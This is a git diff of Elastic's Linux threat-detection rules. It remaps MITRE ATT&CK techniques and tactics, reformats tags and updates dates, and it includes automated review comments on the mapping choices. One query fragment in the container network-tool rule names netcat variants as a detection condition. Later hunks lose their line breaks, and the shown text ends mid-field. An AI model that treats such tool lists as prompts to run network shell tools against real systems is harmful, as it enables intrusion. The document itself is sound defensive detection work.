+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "eql"
query = '''
@@ -127,21 +115,3 @@ reference = "https://attack.mitre.org/techniques/T1057/"
id = "TA0007"
name = "Discovery"
reference = "https://attack.mitre.org/tactics/TA0007/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1003"
-name = "OS Credential Dumping"
-reference = "https://attack.mitre.org/techniques/T1003/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1003.007"
-name = "Proc Filesystem"
-reference = "https://attack.mitre.org/techniques/T1003/007/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/linux/discovery_process_capabilities.toml b/rules/linux/discovery_process_capabilities.toml
index 41b4c8bda26..ae91749e8cf 100644
--- a/rules/linux/discovery_process_capabilities.toml
+++ b/rules/linux/discovery_process_capabilities.toml
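Review bot: Dropping the second `[[rule.threat]]` entry in discovery_proc_maps_read.toml removes T1003.007 "Proc Filesystem", the ATT&CK sub-technique that names proc-filesystem memory-map reads specifically, and leaves the rule mapped to T1057 under Discovery only (the surviving technique is visible in the second hunk's header context). The tag removal in the first hunk is consistent with narrowing to Discovery, so the intent seems deliberate, but the rule's description, investigation guide and `severity = "high"` rationale sit outside these hunks and should be re-read so they no longer frame the activity as credential dumping. If that framing is still wanted, keeping the Credential Access entry alongside Discovery is the more accurate coverage than removing it.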
@@ -2,7 +2,7 @@
creation_date = "2024/01/09"
integration = ["endpoint", "crowdstrike"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -101,9 +101,9 @@ In Linux environments, the `getcap` command is used to list file capabilities, w
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1057"
-name = "Process Discovery"
-reference = "https://attack.mitre.org/techniques/T1057/"
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
[rule.threat.tactic]
id = "TA0007"
diff --git a/rules/linux/discovery_security_file_access_via_common_utility.toml b/rules/linux/discovery_security_file_access_via_common_utility.toml
index c80d995820a..cb7bc9afe40 100644
--- a/rules/linux/discovery_security_file_access_via_common_utility.toml
+++ b/rules/linux/discovery_security_file_access_via_common_utility.toml
@@ -2,7 +2,7 @@
creation_date = "2024/11/04"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2025/12/12"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -83,17 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Discovery",
- "Data Source: Elastic Defend",
- "Data Source: Crowdstrike",
- "Data Source: SentinelOne",
- "Data Source: Elastic Endgame",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "eql"
query = '''
@@ -125,6 +115,29 @@ process.args like (
[[rule.threat]]
framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.001"
+name = "Credentials In Files"
+reference = "https://attack.mitre.org/techniques/T1552/001/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
+
[rule.threat.tactic]
id = "TA0007"
name = "Discovery"
diff --git a/rules/linux/discovery_sudo_allowed_command_enumeration.toml b/rules/linux/discovery_sudo_allowed_command_enumeration.toml
index 9c5015f5db1..aa6bd718253 100644
--- a/rules/linux/discovery_sudo_allowed_command_enumeration.toml
+++ b/rules/linux/discovery_sudo_allowed_command_enumeration.toml
@@ -2,7 +2,7 @@
creation_date = "2023/08/30"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -106,14 +106,13 @@ process where host.os.type == "linux" and event.type == "start" and
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1033"
-name = "System Owner/User Discovery"
-reference = "https://attack.mitre.org/techniques/T1033/"
+[[rule.threat.technique]]
+id = "T1069"
+name = "Permission Groups Discovery"
+reference = "https://attack.mitre.org/techniques/T1069/"
[rule.threat.tactic]
id = "TA0007"
name = "Discovery"
reference = "https://attack.mitre.org/tactics/TA0007/"
-
diff --git a/rules/linux/discovery_suid_sguid_enumeration.toml b/rules/linux/discovery_suid_sguid_enumeration.toml
index ce279082884..4d18a674e20 100644
--- a/rules/linux/discovery_suid_sguid_enumeration.toml
+++ b/rules/linux/discovery_suid_sguid_enumeration.toml
@@ -2,7 +2,7 @@
creation_date = "2023/07/24"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -80,15 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Discovery",
- "Tactic: Privilege Escalation",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "eql"
query = '''
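Review bot: In the discovery_sudo_allowed_command_enumeration.toml threat hunk the `[[rule.threat.technique]]` header is removed and re-added with identical visible text, which usually means the two lines differ only in trailing whitespace or line ending; the same shows in discovery_suspicious_which_command_execution.toml. It is harmless to the rule, but it turns the T1033 → T1069 technique swap into a four-line rewrite instead of a three-line change and will resurface as noise in every later diff until the stray whitespace is stripped from that line.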
@@ -113,29 +105,3 @@ reference = "https://attack.mitre.org/techniques/T1083/"
id = "TA0007"
name = "Discovery"
reference = "https://attack.mitre.org/tactics/TA0007/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1548"
-name = "Abuse Elevation Control Mechanism"
-reference = "https://attack.mitre.org/techniques/T1548/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1548.001"
-name = "Setuid and Setgid"
-reference = "https://attack.mitre.org/techniques/T1548/001/"
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml
index e78382373b9..3a9839168b7 100644
--- a/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml
+++ b/rules/linux/discovery_suspicious_network_tool_launched_inside_container.toml
@@ -2,7 +2,7 @@
creation_date = "2025/03/12"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -87,16 +87,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "low"
-tags = [
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Discovery",
- "Tactic: Command and Control",
- "Tactic: Reconnaissance",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "eql"
query = '''
@@ -112,37 +103,24 @@ not (process.name in ("nc.traditional", "nc", "ncat", "netcat") and process.args
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1046"
-name = "Network Service Discovery"
-reference = "https://attack.mitre.org/techniques/T1046/"
-
-[rule.threat.tactic]
-id = "TA0007"
-name = "Discovery"
-reference = "https://attack.mitre.org/tactics/TA0007/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1105"
-name = "Ingress Tool Transfer"
-reference = "https://attack.mitre.org/techniques/T1105/"
+id = "T1040"
+name = "Network Sniffing"
+reference = "https://attack.mitre.org/techniques/T1040/"
[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
[[rule.threat]]
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1595"
-name = "Active Scanning"
-reference = "https://attack.mitre.org/techniques/T1595/"
+id = "T1046"
+name = "Network Service Discovery"
+reference = "https://attack.mitre.org/techniques/T1046/"
[rule.threat.tactic]
-id = "TA0043"
-name = "Reconnaissance"
-reference = "https://attack.mitre.org/tactics/TA0043/"
+id = "TA0007"
+name = "Discovery"
+reference = "https://attack.mitre.org/tactics/TA0007/"
diff --git a/rules/linux/discovery_suspicious_which_command_execution.toml b/rules/linux/discovery_suspicious_which_command_execution.toml
index 732545b5d3b..5012b1d148f 100644
--- a/rules/linux/discovery_suspicious_which_command_execution.toml
+++ b/rules/linux/discovery_suspicious_which_command_execution.toml
@@ -2,7 +2,7 @@
creation_date = "2023/08/30"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -84,14 +84,13 @@ process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh"
[[rule.threat]]
framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
+[[rule.threat.technique]]
+id = "T1518"
+name = "Software Discovery"
+reference = "https://attack.mitre.org/techniques/T1518/"
[rule.threat.tactic]
id = "TA0007"
name = "Discovery"
reference = "https://attack.mitre.org/tactics/TA0007/"
-
diff --git a/rules/linux/discovery_unusual_user_enumeration_via_id.toml b/rules/linux/discovery_unusual_user_enumeration_via_id.toml
index e855e9a3297..21c52e8d1b2 100644
--- a/rules/linux/discovery_unusual_user_enumeration_via_id.toml
+++ b/rules/linux/discovery_unusual_user_enumeration_via_id.toml
@@ -2,7 +2,7 @@
creation_date = "2023/08/29"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -105,9 +105,24 @@ sequence by host.id, process.parent.entity_id with maxspan=1s
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1033"
-name = "System Owner/User Discovery"
-reference = "https://attack.mitre.org/techniques/T1033/"
+id = "T1069"
+name = "Permission Groups Discovery"
+reference = "https://attack.mitre.org/techniques/T1069/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1069.001"
+name = "Local Groups"
+reference = "https://attack.mitre.org/techniques/T1069/001/"
+
+[[rule.threat.technique]]
+id = "T1087"
+name = "Account Discovery"
+reference = "https://attack.mitre.org/techniques/T1087/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1087.001"
+name = "Local Account"
+reference = "https://attack.mitre.org/techniques/T1087/001/"
[rule.threat.tactic]
id = "TA0007"
diff --git a/rules/linux/discovery_virtual_machine_fingerprinting.toml b/rules/linux/discovery_virtual_machine_fingerprinting.toml
index db90a1ad7af..d333b15eb7c 100644
--- a/rules/linux/discovery_virtual_machine_fingerprinting.toml
+++ b/rules/linux/discovery_virtual_machine_fingerprinting.toml
@@ -2,7 +2,7 @@
creation_date = "2020/04/27"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -104,17 +104,7 @@ Auditbeat is a lightweight shipper that you can install on your servers to audit
- For complete “Setup and Run Auditbeat” information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).
"""
severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Discovery",
- "Data Source: Elastic Endgame",
- "Data Source: Elastic Defend",
- "Data Source: Crowdstrike",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "eql"
query = '''
@@ -138,9 +128,32 @@ process.args in (
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
+id = "T1497"
+name = "Virtualization/Sandbox Evasion"
+reference = "https://attack.mitre.org/techniques/T1497/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1497.001"
+name = "System Checks"
+reference = "https://attack.mitre.org/techniques/T1497/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1497"
+name = "Virtualization/Sandbox Evasion"
+reference = "https://attack.mitre.org/techniques/T1497/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1497.001"
+name = "System Checks"
+reference = "https://attack.mitre.org/techniques/T1497/001/"
[rule.threat.tactic]
id = "TA0007"
diff --git a/rules/linux/discovery_yum_dnf_plugin_detection.toml b/rules/linux/discovery_yum_dnf_plugin_detection.toml
index 2d0397313ad..16b1effaea4 100644
--- a/rules/linux/discovery_yum_dnf_plugin_detection.toml
+++ b/rules/linux/discovery_yum_dnf_plugin_detection.toml
@@ -2,7 +2,7 @@
creation_date = "2024/06/25"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -113,9 +113,14 @@ not ?process.parent.executable == "/usr/lib/venv-salt-minion/bin/python.original
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
+
+[[rule.threat.technique]]
+id = "T1518"
+name = "Software Discovery"
+reference = "https://attack.mitre.org/techniques/T1518/"
[rule.threat.tactic]
id = "TA0007"
diff --git a/rules/linux/execution_abnormal_process_id_file_created.toml b/rules/linux/execution_abnormal_process_id_file_created.toml
index 6310d47ea9b..f73a2c08c13 100644
--- a/rules/linux/execution_abnormal_process_id_file_created.toml
+++ b/rules/linux/execution_abnormal_process_id_file_created.toml
@@ -2,7 +2,7 @@
creation_date = "2022/05/11"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -97,16 +97,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Threat: BPFDoor",
- "Resources: Investigation Guide",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Endgame",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Threat: BPFDoor", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Elastic Endgame"]
timestamp_override = "event.ingested"
type = "new_terms"
query = '''
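Review bot: In the execution_abnormal_process_id_file_created.toml tags hunk the replacement `"Tactic: Defense Evasion"` is placed after `"Threat: BPFDoor"`, whereas the removed array and every other reflowed tags line in this change keep the `Tactic:` tags immediately after the `Use Case:` tags (for example `"Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Crowdstrike"` in execution_cupsd_foomatic_rip_lp_user_execution.toml). Suggest `"Use Case: Threat Detection", "Tactic: Defense Evasion", "Threat: BPFDoor", "Resources: Investigation Guide", ...` so the ordering stays uniform across the rule set and a later sort-on-save does not produce a second diff for this file.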
@@ -144,15 +135,19 @@ file.extension:(pid or lock or reboot) and file.path:(/var/run/* or /run/*) and
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1106"
-name = "Native API"
-reference = "https://attack.mitre.org/techniques/T1106/"
+id = "T1036"
+name = "Masquerading"
+reference = "https://attack.mitre.org/techniques/T1036/"
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat.technique.subtechnique]]
+id = "T1036.005"
+name = "Match Legitimate Resource Name or Location"
+reference = "https://attack.mitre.org/techniques/T1036/005/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
[rule.new_terms]
field = "new_terms_fields"
value = ["process.name", "file.name"]
diff --git a/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml b/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml
index ecf13768813..afd71b6364b 100644
--- a/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml
+++ b/rules/linux/execution_cupsd_foomatic_rip_file_creation.toml
@@ -2,7 +2,7 @@
creation_date = "2024/09/27"
integration = ["endpoint", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -123,6 +123,16 @@ sequence by host.id with maxspan=10s
[[rule.threat]]
framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+
[[rule.threat.technique]]
id = "T1203"
name = "Exploitation for Client Execution"
diff --git a/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml
index e3029462837..7a0b343479e 100644
--- a/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml
+++ b/rules/linux/execution_cupsd_foomatic_rip_lp_user_execution.toml
@@ -2,7 +2,7 @@
creation_date = "2024/09/27"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -103,19 +103,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Use Case: Vulnerability",
- "Tactic: Execution",
- "Data Source: Crowdstrike",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Endgame",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Crowdstrike", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "eql"
query = '''
@@ -135,11 +123,29 @@ process where host.os.type == "linux" and event.type == "start" and
framework = "MITRE ATT&CK"
[[rule.threat.technique]]
-id = "T1203"
-name = "Exploitation for Client Execution"
-reference = "https://attack.mitre.org/techniques/T1203/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
[rule.threat.tactic]
id = "TA0002"
name = "Execution"
reference = "https://attack.mitre.org/tactics/TA0002/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1190"
+name = "Exploit Public-Facing Application"
+reference = "https://attack.mitre.org/techniques/T1190/"
+
+[rule.threat.tactic]
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
diff --git a/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml
index 9a89825b302..9e4b83c0aab 100644
--- a/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml
+++ b/rules/linux/execution_cupsd_foomatic_rip_shell_execution.toml
@@ -2,7 +2,7 @@
creation_date = "2024/09/27"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -132,14 +132,18 @@ process where host.os.type == "linux" and event.type == "start" and
[[rule.threat]]
framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
-id = "T1203"
-name = "Exploitation for Client Execution"
-reference = "https://attack.mitre.org/techniques/T1203/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
[rule.threat.tactic]
id = "TA0002"
name = "Execution"
reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml
index 21393246708..63b6636a9ca 100644
--- a/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml
+++ b/rules/linux/execution_cupsd_foomatic_rip_suspicious_child_execution.toml
@@ -2,7 +2,7 @@
creation_date = "2024/09/27"
integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -103,18 +103,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
"""
severity = "high"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Use Case: Vulnerability",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Data Source: Crowdstrike",
- "Data Source: SentinelOne",
- "Data Source: Elastic Endgame",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "eql"
@@ -148,14 +137,31 @@ process.parent.name in ("foomatic-rip", "cupsd") and process.command_line like (
[[rule.threat]]
framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
-id = "T1203"
-name = "Exploitation for Client Execution"
-reference = "https://attack.mitre.org/techniques/T1203/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
[rule.threat.tactic]
id = "TA0002"
name = "Execution"
reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml
index 4f987d0a01c..a1c87d57ec2 100644
--- a/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml
+++ b/rules/linux/execution_egress_connection_from_entrypoint_in_container.toml
@@ -2,7 +2,7 @@
creation_date = "2024/07/10"
integration = ["endpoint"]
maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
[rule]
author = ["Elastic"]
@@ -54,15 +54,7 @@ Containers, often used for deploying applications, start with an entrypoint scri
risk_score = 47
rule_id = "c75d0c86-38d6-4821-98a1-465cff8ff4c8"
severity = "medium"
-tags = [
- "Domain: Endpoint",
- "Domain: Container",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Execution",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
timestamp_override = "event.ingested"
type = "eql"
query = '''
@@ -86,6 +78,19 @@ sequence by host.id with maxspan=3s
[[rule.threat]]
framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1071"
+name = "Application Layer Protocol"
+reference = "https://attack.mitre.org/techniques/T1071/"
+
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
[[rule.threat.technique]]
id = "T1059"
name = "Command and Scripting Interpreter"
@@ -100,16 +105,3 @@ reference = "https://attack.mitre.org/techniques/T1059/004/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1611" -name = "Escape to Host" -reference = "https://attack.mitre.org/techniques/T1611/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/execution_executable_stack_execution.toml b/rules/linux/execution_executable_stack_execution.toml index db15ac7e5ad..e06b6cc1346 100644 --- a/rules/linux/execution_executable_stack_execution.toml +++ b/rules/linux/execution_executable_stack_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["system"] maturity = "production" -updated_date = "2025/01/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -88,20 +88,3 @@ In Linux environments, processes with executable stacks can pose security risks - Implement stack protection mechanisms such as stack canaries or non-executable stack configurations to prevent future exploitation. - Escalate the incident to the security operations team for further investigation and to assess the need for additional security measures.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/execution_file_execution_followed_by_deletion.toml b/rules/linux/execution_file_execution_followed_by_deletion.toml index d2a3a87c967..4b8060d9d8e 100644 
--- a/rules/linux/execution_file_execution_followed_by_deletion.toml +++ b/rules/linux/execution_file_execution_followed_by_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,14 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id, user.id with maxspan=1m @@ -109,6 +102,37 @@ sequence by host.id, user.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1105" +name = 